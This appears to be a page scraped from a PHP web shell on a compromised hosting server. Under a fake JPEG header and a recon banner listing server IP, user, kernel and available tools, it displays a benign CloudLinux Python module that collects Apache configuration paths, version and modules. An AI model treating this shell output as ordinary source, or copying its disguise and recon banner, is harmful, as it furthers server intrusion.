ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.184 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/cloudlinux/venv/lib64/python3.11/site-packages/cl_website_collector/ |
Upload File : |
# -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2024 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT import logging import os import subprocess import shutil from typing import Dict, List, Optional, Any class ApacheProcessor: """ Collects Apache configuration and module information. """ def __init__(self, logger: logging.Logger): # General Apache configuration directories (exclude user-specific subdirs) self.apache_config_locations = [ '/etc/apache2/conf/', '/etc/apache2/conf-available/', '/etc/apache2/conf.d/', # Will be filtered to exclude userdata subdirs '/etc/apache2/conf.modules.d/', ] # User-specific configuration base paths (Apache versions 2.2 and 2.4) self.user_config_base_paths = [ '/etc/apache2/conf.d/userdata/ssl/2_4', # SSL configs for Apache 2.4 '/etc/apache2/conf.d/userdata/std/2_4', # Standard configs for Apache 2.4 '/etc/apache2/conf.d/userdata/ssl/2_2', # SSL configs for Apache 2.2 (legacy) '/etc/apache2/conf.d/userdata/std/2_2', # Standard configs for Apache 2.2 (legacy) ] self.logger = logger self._apache_binary_cache = None self._apache_version_cache = None self._apache_modules_cache = None def _find_apache_binary(self) -> Optional[str]: """ Find Apache binary executable using which command with caching. """ if self._apache_binary_cache is not None: return self._apache_binary_cache error = None try: for binary_name in ['httpd', 'apache2']: binary_path = shutil.which(binary_name) if binary_path and os.access(binary_path, os.X_OK): self.logger.debug("Found Apache binary: %s", binary_path) self._apache_binary_cache = binary_path return binary_path except Exception as e: error = e self.logger.error("[WEBSITE-COLLECTOR] Apache binary not found in PATH %s", error) self._apache_binary_cache = None return None def _get_apache_version(self) -> str: """ Get Apache version information with caching. """ if self._apache_version_cache is not None: return self._apache_version_cache apache_binary = self._find_apache_binary() if not apache_binary: self._apache_version_cache = "Apache binary not found" return self._apache_version_cache try: result = subprocess.run( [apache_binary, '-v'], capture_output=True, text=True, timeout=10, check=False ) if result.returncode == 0: # Extract just the version line for cleaner metadata version_output = result.stdout.strip() if version_output: # Get first line which contains version info first_line = version_output.split('\n')[0] self._apache_version_cache = first_line else: self._apache_version_cache = "Version info empty" else: self._apache_version_cache = f"Error getting version: {result.stderr.strip()}" except subprocess.TimeoutExpired: self._apache_version_cache = "Version check timed out" except Exception as e: self._apache_version_cache = f"Version check failed: {e}" return self._apache_version_cache def _get_apache_modules(self) -> List[str]: """ Get Apache modules using httpd -M command with caching. Returns: List of module names (e.g., ['core_module', 'so_module', 'http_module', ...]) """ # Return cached modules if available if self._apache_modules_cache is not None: return self._apache_modules_cache apache_binary = self._find_apache_binary() if not apache_binary: self.logger.debug("Apache binary not found, cannot get modules") self._apache_modules_cache = [] return self._apache_modules_cache try: result = subprocess.run( [apache_binary, '-M'], capture_output=True, text=True, timeout=10, check=False ) if result.returncode == 0: modules = [] lines = result.stdout.split('\n') # Skip first line 'Loaded Modules:' and process module lines for line in lines[1:]: if not line.strip(): continue # Parse line like: "core_module (static)" or "so_module (shared)" try: module_name = line.strip().split(' ')[0] if module_name: modules.append(module_name) except (IndexError, AttributeError): continue # Skip malformed lines self.logger.debug("Found %d Apache modules via %s -M", len(modules), apache_binary) self._apache_modules_cache = modules return modules self.logger.debug("Apache modules command failed: %s", result.stderr.strip()) self._apache_modules_cache = [] return self._apache_modules_cache except subprocess.TimeoutExpired: self.logger.error("[WEBSITE-COLLECTOR] Apache modules command timed out") self._apache_modules_cache = [] return self._apache_modules_cache except Exception as e: self.logger.error("[WEBSITE-COLLECTOR] Failed to get Apache modules: %s", e) self._apache_modules_cache = [] return self._apache_modules_cache def get_apache_system_info(self) -> Dict[str, Any]: """ Get Apache system information for export as separate record. Returns: Dict with system information to be exported as single record """ modules = self._get_apache_modules() version = self._get_apache_version() system_info = { 'apache_version': version, 'loaded_modules': modules, } return system_info def _get_user_config_locations(self, usernames: List[str]) -> List[str]: """ Get Apache configuration directories for specific users only. Args: usernames: List of usernames to get configurations for Returns: List of directories containing user-specific Apache configurations """ user_locations = [] for username in usernames: for base_path in self.user_config_base_paths: user_path = os.path.join(base_path, username) if os.path.isdir(user_path): user_locations.append(user_path) self.logger.debug("Found user config directory: %s", user_path) return user_locations def collect_user_specific_config_paths(self, usernames: List[str]) -> Dict[str, Any]: """ Collect paths to user-specific Apache configuration files. Args: usernames: List of usernames to collect configs for Returns: Dict with collected config file paths as simple list """ config_data = { 'config_paths': [] } if not usernames: return config_data try: user_locations = self._get_user_config_locations(usernames) self.logger.debug("Scanning %d user-specific locations for %d users", len(user_locations), len(usernames)) for location in user_locations: if os.path.isdir(location): self._collect_config_paths_from_directory(location, config_data, exclude_user_dirs=False) except Exception as e: self.logger.error("[WEBSITE-COLLECTOR] Error in collect_user_specific_config_paths: %s", e) self.logger.debug("Found %d user-specific Apache config files", len(config_data['config_paths'])) return config_data def collect_global_config_paths(self) -> Dict[str, Any]: """ Collect paths to general Apache configuration files (non-user-specific). Returns: Dict with collected config file paths as simple list """ config_data = { 'config_paths': [] } try: for location in self.apache_config_locations: if os.path.isdir(location): try: # For conf.d directory, exclude userdata subdirs to avoid collecting user-specific configs exclude_users = location.rstrip('/').endswith('/conf.d') self._collect_config_paths_from_directory(location, config_data, exclude_user_dirs=exclude_users) self.logger.debug("Collected config paths from %s (exclude_user_dirs=%s)", location, exclude_users) except Exception as e: self.logger.error("[WEBSITE-COLLECTOR] Error scanning config directory %s: %s", location, e) self.logger.debug("Found %d general Apache config files", len(config_data['config_paths'])) except Exception as e: self.logger.error("[WEBSITE-COLLECTOR] Error in collect_global_config_paths: %s", e) return config_data def _collect_config_paths_from_directory(self, location: str, config_data: Dict[str, Any], exclude_user_dirs: bool = False) -> None: """ Helper method to collect configuration file paths from a specific directory. Args: location: Directory path to scan for .conf files config_data: Dictionary with 'config_paths' list to store collected paths exclude_user_dirs: If True, skip userdata subdirectories to avoid collecting user-specific configs """ max_depth = 10 # Reasonable limit for Apache configs for root, dirs, files in os.walk(location): # Calculate current depth relative to base location depth = root[len(location):].count(os.sep) if depth >= max_depth: dirs[:] = [] # Don't descend further continue # Exclude userdata directories when collecting general configs if exclude_user_dirs and 'userdata' in dirs: dirs.remove('userdata') self.logger.debug("Excluded userdata directory from general config collection in %s", root) for filename in files: if filename.endswith('.conf'): file_path = os.path.join(root, filename) # Check if file exists (including symlinks) and is readable if (os.path.exists(file_path) and (os.path.isfile(file_path) or os.path.islink(file_path)) and os.access(file_path, os.R_OK)): # Add to simple list - no grouping by directory needed config_data['config_paths'].append({ 'file_path': file_path, 'is_symlink': os.path.islink(file_path) }) else: self.logger.debug("Cannot access config file: %s", file_path)